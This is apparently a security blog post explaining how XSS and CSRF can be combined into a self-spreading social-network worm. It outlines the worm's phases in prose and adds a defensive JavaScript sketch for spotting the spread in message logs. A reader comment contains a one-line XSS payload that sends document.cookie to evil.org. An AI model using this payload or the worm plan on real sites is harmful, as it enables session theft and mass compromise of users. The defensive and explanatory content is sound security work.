JS Judo + XSS + CSRF = Pwnage
…an excellent breeding environment for an XSS worm…
What is an XSS worm?
Wikipedia
An XSS Worm, also known as a cross site scripting virus[1], is a malicious (or sometimes non-malicious) payload that propagates among visitors of a website in the attempt to progressively infect other visitors.
Sticking to KIS (keep it simple) standards, it’s a piece of code that propagates…
JS Judo?
Reuse of JS code… JS Judo – JS Judo II… Targets for JS Judoing would be frameworks like Dojo, Prototype, jQuery, MooTools, etc…
XSS?
If you don’t know what XSS is, you’re in the wrong place now…
CSRF?
Same as above… wrote a couple of articles about it somewhere around here…
Gluing the pieces together
Getting the idea and all (as a startup article): “Launching XSS CSRF Based Worms On Social Networks”… Also “Writing A Modular Universal XSS Worm” may sound interesting… but if you’re the same as me, making the code propagate and have a payload is more than enough…
KIS?
Keeping it simple… here is what the worm should do…
—
:phase 1
after load -> get list with friends
message them (all) a link that loads (via XSS) the worm
:phase 2
payload
—
In theory it’s very simple, but when writing the code it’s essential to understand the site structure (to know what requests to make, and how to parse the responses)… also sometimes you’ll have to grab the anti-CSRF token… good luck… =)
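Seen from the defender's side, phase 1 leaves a recognisable shape in the message log: one account sends the same link to nearly all of its friends within seconds, and a recipient then does the same. The sketch below is an added example, not code from the original post; the log format, field names, thresholds and sample data are constructed assumptions.

```javascript
// Constructed sample data (not from any real site): friend lists and a message log.
const friends = {
  alice: ["bob", "carol", "dave"],
  bob: ["alice", "erin", "frank"],
  erin: ["bob", "carol"],
};
const WORM = "https://social.example/profile?q=PLACEHOLDER"; // hypothetical link
const NEWS = "https://news.example/story";
const messages = [ // t = seconds since start of log
  { t: 100, from: "alice", to: "bob", url: WORM },
  { t: 101, from: "alice", to: "carol", url: WORM },
  { t: 102, from: "alice", to: "dave", url: WORM },
  { t: 130, from: "bob", to: "alice", url: WORM },
  { t: 131, from: "bob", to: "erin", url: WORM },
  { t: 132, from: "bob", to: "frank", url: WORM },
  { t: 600, from: "erin", to: "bob", url: NEWS },
  { t: 9000, from: "erin", to: "carol", url: NEWS }, // same link, but hours apart
];

// Phase 1 signature: one sender, one URL, (nearly) every friend, within seconds.
function fanOutSenders(log, friendLists, windowSec = 10, minCoverage = 0.9) {
  const groups = new Map();
  for (const m of log) {
    const key = `${m.from}\n${m.url}`;
    groups.set(key, [...(groups.get(key) || []), m]);
  }
  const hits = [];
  for (const msgs of groups.values()) {
    const { from, url } = msgs[0];
    const list = friendLists[from] || [];
    msgs.sort((a, b) => a.t - b.t);
    let best = 0, firstSeen = 0, lo = 0;
    for (let hi = 0; hi < msgs.length; hi++) {
      while (msgs[hi].t - msgs[lo].t > windowSec) lo++; // slide window start forward
      const reached = new Set(msgs.slice(lo, hi + 1).map((m) => m.to).filter((to) => list.includes(to)));
      if (reached.size > best) { best = reached.size; firstSeen = msgs[lo].t; }
    }
    if (list.length >= 2 && best / list.length >= minCoverage) hits.push({ from, url, t: firstSeen });
  }
  return hits.sort((a, b) => a.t - b.t);
}

// Propagation: a flagged sender who earlier received the same URL from another flagged sender.
function propagationEdges(log, hits) {
  return hits.flatMap((h) => log
    .filter((m) => m.to === h.from && m.url === h.url && m.t < h.t &&
      hits.some((p) => p.from === m.from && p.url === h.url))
    .map((m) => `${m.from}->${h.from}`));
}
console.log(propagationEdges(messages, fanOutSenders(messages, friends)));
```

A single fan-out hit can be a legitimate broadcast; the propagation edge between two flagged senders is the stronger signal that a link is spreading on its own.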
3 comments so far
document.write(’<img src=”http://evil.org/’+document.cookie+’”)